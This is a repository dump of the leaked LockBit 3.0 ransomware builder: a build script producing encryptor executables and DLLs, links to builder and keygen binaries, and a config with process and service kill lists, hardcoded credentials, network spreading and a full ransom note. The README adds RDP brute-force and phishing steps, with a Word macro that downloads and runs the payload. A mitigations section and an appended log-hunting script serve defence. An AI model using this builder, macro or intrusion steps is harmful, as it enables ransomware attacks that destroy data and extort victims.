├── Build.bat ├── README.md ├── builder.exe ├── config.json └── keygen.exe /Build.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo Press any key to generate the LockBit files (will overwrite existing files)... 3 | pause >nul 4 | IF exist Build (ERASE /F /Q Build\*.*) ELSE (mkdir Build) 5 | echo (1/7) Generating keys 6 | keygen -path Build -pubkey pub.key -privkey priv.key 7 | echo (2/7) Building decryptor 8 | builder -type dec -privkey Build\priv.key -config config.json -ofile Build\LB3Decryptor.exe 9 | echo (3/7) Building ransomware executable 10 | builder -type enc -exe -pubkey Build\pub.key -config config.json -ofile Build\LB3.exe 11 | echo (4/7) Building ransomware executable that requires password 12 | builder -type enc -exe -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_pass.exe 13 | echo (5/7) Building ransomware DLL 14 | builder -type enc -dll -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32.dll 15 | echo (6/7) Building ransomware DLL that requires password 16 | builder -type enc -dll -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32_pass.dll 17 | echo (7/7) Building reflective DLL 18 | builder -type enc -ref -pubkey Build\pub.key -config config.json -ofile Build\LB3_ReflectiveDll_DllMain.dll 19 | echo Done. 20 | pause >nul 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LockBit 2 | LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware. 

## Initial Access
LockBit 3.0 affiliates gain initial access to victim networks via remote desktop protocol (RDP) exploitation, drive-by compromise, phishing campaigns, abuse of valid accounts, and exploitation of public-facing applications. The payload itself also carries a short list of hardcoded credentials to try when impersonating an account: see `impers_accounts` in this repo's `config.json` (for example `Administrator:P@ssw0rd`).

## Execution and Infiltration
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges. LockBit 3.0 performs functions such as:

* Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices
* Terminating processes and services. The `kill_processes` and `kill_services` lists in `config.json` name database, mail, Office, backup and security software (`vss`, `veeam`, `backup`, `sophos`, `msexchange`, ...), and `kill_defender` targets Windows Defender
* Launching commands
* Enabling automatic logon for persistence and privilege escalation
* Deleting log files, files in the recycle bin folder, and shadow copies residing on disk (`delete_eventlogs` is on in this repo's `config.json`)
* Spreading across the network using Group Policy Objects or PsExec over SMB. In this repo's `config.json`, `gpo_netspread` is on and `psexec_netspread` is off

After files are encrypted, LockBit 3.0 drops a ransom note named `<Ransomware ID>.README.txt` and changes the host's wallpaper and icons to LockBit 3.0 branding. When `send_report` is enabled, LockBit 3.0 sends encrypted host and bot information to a command and control (C2) server (the `gate_urls` entries in `config.json`).

## Mitigations
* Keep all systems, software, and firmware up to date
* Do not expose RDP (TCP 3389) directly to the internet; require MFA for RDP, VPN and other remote access, and disable unused ports and services
* Use unique, strong local administrator passwords. The passwords in `impers_accounts` (`P@ssw0rd`, `Qwerty!`, `123QWEqwe`) are the kind of defaults the payload tries first
* Run an endpoint security product with tamper protection enabled so that a local administrator cannot stop it. The config sets `kill_defender: true`, but `kill_services` also lists Sophos and other agents, so installing a different vendor's product in place of Windows Defender is not a defence by itself
* Take backups, keep a copy offline or immutable, and test restores. `kill_services` targets VSS, Veeam and any service with `backup` in its name, and shadow copies are deleted
* Forward Windows event logs to a central collector, since `delete_eventlogs` is enabled
* Restrict who can create or link GPOs and alert on new GPOs, since `gpo_netspread` is enabled

## Testing on Authorized Systems
To test LockBit 3.0 on a system, you must first generate the files required before accessing the system. The batch file in this repo can automate this process. Only run the output on an isolated lab network you own: with `local_disks`, `network_shares` and `gpo_netspread` enabled in `config.json`, a sample run on a domain-joined host will reach beyond that host.

Once that has been done, there are several different methods for accessing the system and many are included in guides online. The process for a couple of methods will be listed here.

### Accessing a System with RDP
This method will not work if the target does not have RDP enabled or does not have the port forwarded on the network.
Make sure this is done beforehand. Brute forcing the password also takes a significant amount of time and if the password is good enough, it may be near impossible. 31 | 1. Know the IP address of your target or obtain it with NMAP 32 | 2. Make sure the port 3389 is open on the target's network with NMAP 33 | 3. Use a brute force tool such as Crowbar or Hydra 34 | 4. Connect using a client of your choice 35 | 5. Copy the LockBit 3.0 files to the remote machine using your client, a cloud service, FTP, or any other method of your choice 36 | 6. Execute Lockbit 3.0 37 | 38 | ### Accessing a System with a Phishing Scheme 39 | In this case, an email will be sent with a job application. When the job application is opened (using Microsoft Word) and the button to start editing it is pressed, LockBit 3.0 is downloaded and executed. There is a guide online, but here are some tips: 40 | 1. In Word, enter dev mode with `Alt+F8` 41 | 2. The macro in the guide works, but only for an executable already in the path. An easy way to copy and execute LockBit 3.0 is to download and run the executable in the macro. Here is a version of the macro that implements this: 42 | ``` 43 | Sub Document_Open() 44 | 45 | dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") 46 | dim bStrm: Set bStrm = createobject("Adodb.Stream") 47 | xHttp.Open "GET", "http://example.com/LB3.exe", False 48 | xHttp.Send 49 | 50 | with bStrm 51 | .type = 1 '//binary 52 | .open 53 | .write xHttp.responseBody 54 | .savetofile "c:\temp\LB3.exe", 2 '//overwrite 55 | end with 56 | 57 | CreateObject("WScript.Shell").Run "c:\temp\LB3.exe" 58 | 59 | End Sub 60 | ``` 61 | 3. Follow everything else in the guide to create the final document 62 | 4. 
Send an email containing the document, and when the user opens and presses "Enable Editing", it should execute LockBit 3.0 63 | 64 | ## [#StopRansomware: LockBit 3.0](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a) 65 | 66 | **This project is only for the investigation of the ransomware and how it can be mitigated. It is not to be used to attack systems without authorization.** 67 | 68 | “#Stopransomware: LockBit 3.0: CISA.” Cybersecurity and Infrastructure Security Agency CISA, 15 Mar. 2023, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a. 69 | 70 | -------------------------------------------------------------------------------- /builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tennessene/LockBit/2f5cfff7b610d4ac47af479997389d32589fe48c/builder.exe -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "bot": { 3 | "uid": "00000000000000000000000000000000", 4 | "key": "00000000000000000000000000000000" 5 | }, 6 | "config": { 7 | "settings": { 8 | "encrypt_mode": "auto", 9 | "encrypt_filename": false, 10 | "impersonation": true, 11 | "skip_hidden_folders": false, 12 | "language_check": false, 13 | "local_disks": true, 14 | "network_shares": true, 15 | "kill_processes": true, 16 | "kill_services": true, 17 | "running_one": true, 18 | "print_note": true, 19 | "set_wallpaper": true, 20 | "set_icons": true, 21 | "send_report": false, 22 | "self_destruct": true, 23 | "kill_defender": true, 24 | "wipe_freespace": false, 25 | "psexec_netspread": false, 26 | "gpo_netspread": true, 27 | "gpo_ps_update": true, 28 | "shutdown_system": false, 29 | "delete_eventlogs": true, 30 | "delete_gpo_delay": 1 31 | }, 32 | "white_folders": "$recycle.bin;config.msi;$windows.~bt;$windows.~ws;windows;boot;program files;program files 
(x86);programdata;system volume information;tor browser;windows.old;intel;msocache;perflogs;x64dbg;public;all users;default;microsoft", 33 | "white_files": "autorun.inf;boot.ini;bootfont.bin;bootsect.bak;desktop.ini;iconcache.db;ntldr;ntuser.dat;ntuser.dat.log;ntuser.ini;thumbs.db;GDIPFONTCACHEV1.DAT;d3d9caps.dat", 34 | "white_extens": "386;adv;ani;bat;bin;cab;cmd;com;cpl;cur;deskthemepack;diagcab;diagcfg;diagpkg;dll;drv;exe;hlp;icl;icns;ico;ics;idx;ldf;lnk;mod;mpa;msc;msp;msstyles;msu;nls;nomedia;ocx;prf;ps1;rom;rtp;scr;shs;spl;sys;theme;themepack;wpx;lock;key;hta;msi;pdb;search-ms", 35 | "white_hosts": "WS2019", 36 | "kill_processes": "sql;oracle;ocssd;dbsnmp;synctime;agntsvc;isqlplussvc;xfssvccon;mydesktopservice;ocautoupds;encsvc;firefox;tbirdconfig;mydesktopqos;ocomm;dbeng50;sqbcoreservice;excel;infopath;msaccess;mspub;onenote;outlook;powerpnt;steam;thebat;thunderbird;visio;winword;wordpad;notepad;calc;wuauclt;onedrive", 37 | "kill_services": "vss;sql;svc$;memtas;mepocs;msexchange;sophos;veeam;backup;GxVss;GxBlr;GxFWD;GxCVD;GxCIMgr", 38 | "gate_urls": "https://test.white-datasheet.com/;http://test.white-datasheet.com/", 39 | "impers_accounts": "ad.lab:Qwerty!;Administrator:123QWEqwe!@#;Admin2:P@ssw0rd;Administrator:P@ssw0rd;Administrator:Qwerty!;Administrator:123QWEqwe;Administrator:123QWEqweqwe", 40 | "note": " 41 | ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~ 42 | 43 | >>>> Your data are stolen and encrypted 44 | 45 | The data will be published on TOR website if you do not pay the ransom 46 | 47 | Links for Tor Browser: 48 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion 49 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion 50 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 51 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 52 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion 53 | 
http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion 54 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 55 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion 56 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion 57 | 58 | Links for the normal browser 59 | http://lockbitapt.uz 60 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly 61 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly 62 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 63 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 64 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly 65 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly 66 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 67 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly 68 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly 69 | 70 | 71 | >>>> What guarantees that we will not deceive you? 72 | 73 | We are not a politically motivated group and we do not need anything other than your money. 74 | 75 | If you pay, we will provide you the programs for decryption and we will delete your data. 76 | Life is too short to be sad. Be not sad, money, it is only paper. 77 | 78 | If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. 79 | Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. 
80 | 81 | You can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live 82 | 83 | 84 | >>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION ID 85 | 86 | Download and install TOR Browser https://www.torproject.org/ 87 | Write to a chat and wait for the answer, we will always answer you. 88 | Sometimes you will need to wait for our answer because we attack many companies. 89 | 90 | Links for Tor Browser: 91 | http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion 92 | http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion 93 | http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 94 | 95 | Link for the normal browser 96 | http://lockbitsupp.uz 97 | 98 | If you do not get an answer in the chat room for a long time, the site does not work and in any other emergency, you can contact us in jabber or tox. 99 | 100 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 101 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 102 | 103 | >>>> Your personal DECRYPTION ID: B7568014A48684D6D525F3F3722638C4 104 | 105 | >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! 106 | 107 | >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again! 108 | 109 | 110 | >>>> Advertisement 111 | 112 | Would you like to earn millions of dollars $$$ ? 113 | 114 | Our company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. 115 | You can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. 116 | Open our letter at your email. Launch the provided virus on any computer in your company. 
117 | 118 | You can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us. 119 | 120 | Companies pay us the foreclosure for the decryption of files and prevention of data leak. 121 | 122 | You can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. 123 | Using Tox messenger, we will never know your real name, it means your privacy is guaranteed. 124 | 125 | If you want to contact us, write in jabber or tox. 126 | 127 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 128 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 129 | 130 | If this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser 131 | 132 | Links for Tor Browser: 133 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion 134 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion 135 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 136 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 137 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion 138 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion 139 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 140 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion 141 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion 142 | 143 | 144 | Links for the normal browser 145 | http://lockbitapt.uz 146 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly 147 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly 148 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 149 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 150 | 
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly 151 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly 152 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 153 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly 154 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly" 155 | } 156 | } -------------------------------------------------------------------------------- /keygen.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tennessene/LockBit/2f5cfff7b610d4ac47af479997389d32589fe48c/keygen.exe --------------------------------------------------------------------------------
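The `config.json` above and the Execution and Infiltration section of the README describe what a built payload does: stop the listed processes and services, try the hardcoded `impers_accounts` credentials, clear event logs, write the `.README.txt` note. The script below is an added defensive example, not code from this repository or from the LockBit builder: it parses a constructed subset of that config into hunt artifacts and runs them over constructed sample events. The field names mirror the Windows Security (4624/4625/1102), System (7036) and Sysmon (5, 11) events they imitate; the case-insensitive substring matching and the flat event shape are assumptions, since the page does not say how the payload compares names.

```python
"""Turn a LockBit 3.0 builder config into hunt artifacts and match them against events.

Added example for this page; it is not code from the Tennessene/LockBit repository or
from the LockBit builder. CONFIG_JSON is a constructed subset of the repo's config.json
(same field names and values; the ransom note, URLs and most list entries are omitted).
SAMPLE_EVENTS are constructed, not real telemetry.
"""
from __future__ import annotations

import json
import re

CONFIG_JSON = r"""
{
  "config": {
    "settings": {
      "kill_processes": true,
      "kill_services": true,
      "kill_defender": true,
      "delete_eventlogs": true,
      "gpo_netspread": true,
      "psexec_netspread": false
    },
    "white_hosts": "WS2019",
    "kill_processes": "sql;oracle;excel;outlook;winword;onedrive;wuauclt",
    "kill_services": "vss;sql;svc$;memtas;mepocs;msexchange;sophos;veeam;backup;GxVss;GxBlr;GxFWD;GxCVD;GxCIMgr",
    "impers_accounts": "ad.lab:Qwerty!;Administrator:123QWEqwe!@#;Admin2:P@ssw0rd;Administrator:P@ssw0rd"
  }
}
"""


def _split(field: str) -> list[str]:
    """Builder lists are ';'-separated strings."""
    return [item for item in field.split(";") if item]


def hunt_artifacts(config_text: str) -> dict:
    """Extract the fields a defender can act on from a builder config."""
    cfg = json.loads(config_text)["config"]
    flags = cfg["settings"]
    creds = [entry.split(":", 1) for entry in _split(cfg["impers_accounts"])]
    return {
        "kill_processes": _split(cfg["kill_processes"]) if flags["kill_processes"] else [],
        "kill_services": _split(cfg["kill_services"]) if flags["kill_services"] else [],
        # Hardcoded credentials the payload tries when impersonating: hunt for these
        # usernames in logon events and audit local admins for these passwords.
        "impersonation_users": sorted({user.lower() for user, _ in creds}),
        "impersonation_passwords": sorted({pw for _, pw in creds}),
        "skipped_hosts": _split(cfg["white_hosts"]),
        "clears_event_logs": bool(flags["delete_eventlogs"]),
        "spreads_via_gpo": bool(flags["gpo_netspread"]),
    }


# Constructed sample events (not real telemetry). Field names follow the Windows
# Security, System and Sysmon events they imitate.
SAMPLE_EVENTS = [
    {"source": "Security", "event_id": 4625, "TargetUserName": "Admin2", "IpAddress": "10.0.0.7"},
    {"source": "Security", "event_id": 4624, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.7"},
    {"source": "System", "event_id": 7036, "param1": "Veeam Backup Service", "param2": "stopped"},
    {"source": "System", "event_id": 7036, "param1": "Print Spooler", "param2": "stopped"},
    {"source": "Sysmon", "event_id": 5, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"source": "Sysmon", "event_id": 5, "Image": r"C:\Windows\System32\svchost.exe"},
    {"source": "Security", "event_id": 1102, "SubjectUserName": "Administrator"},
    {"source": "Sysmon", "event_id": 11, "TargetFilename": r"C:\Users\bob\Desktop\AbCdEfGh.README.txt"},
    {"source": "Sysmon", "event_id": 11, "TargetFilename": r"C:\Users\bob\Desktop\notes.txt"},
]

NOTE_NAME = re.compile(r"\.README\.txt$", re.IGNORECASE)  # <Ransomware ID>.README.txt


def match_events(events: list[dict], artifacts: dict) -> list[tuple[int, str]]:
    """Return (event index, rule) pairs for events consistent with the payload's behaviour.

    Names are matched as case-insensitive substrings: the config lists fragments such as
    'sql' and 'backup', and the page does not state how the payload compares names, so
    substring matching is the conservative choice for hunting (assumption).
    """
    procs = [p.lower() for p in artifacts["kill_processes"]]
    svcs = [s.lower().rstrip("$") for s in artifacts["kill_services"]]
    users = set(artifacts["impersonation_users"])
    hits: list[tuple[int, str]] = []
    for idx, ev in enumerate(events):
        src, eid = ev["source"], ev["event_id"]
        if src == "Security" and eid in (4624, 4625):
            if ev["TargetUserName"].lower() in users:
                hits.append((idx, "logon with hardcoded impersonation account"))
        elif src == "Security" and eid == 1102 and artifacts["clears_event_logs"]:
            hits.append((idx, "security log cleared"))
        elif src == "System" and eid == 7036 and ev["param2"] == "stopped":
            if any(s in ev["param1"].lower() for s in svcs):
                hits.append((idx, "targeted service stopped"))
        elif src == "Sysmon" and eid == 5:
            image = ev["Image"].lower().rsplit("\\", 1)[-1]
            if any(p in image for p in procs):
                hits.append((idx, "targeted process terminated"))
        elif src == "Sysmon" and eid == 11 and NOTE_NAME.search(ev["TargetFilename"]):
            hits.append((idx, "ransom note written"))
    return hits


if __name__ == "__main__":
    arts = hunt_artifacts(CONFIG_JSON)
    for key, value in arts.items():
        print(f"{key}: {value}")
    for idx, rule in match_events(SAMPLE_EVENTS, arts):
        print(f"event {idx}: {rule}")
```

Point `hunt_artifacts` at the full `config.json` from the repo to get the complete lists; the `impersonation_passwords` output is also a ready-made list for checking local administrator accounts, and `skipped_hosts` (`WS2019` here) is the hostname the payload refuses to encrypt, which is worth knowing when a sample is detonated in a lab.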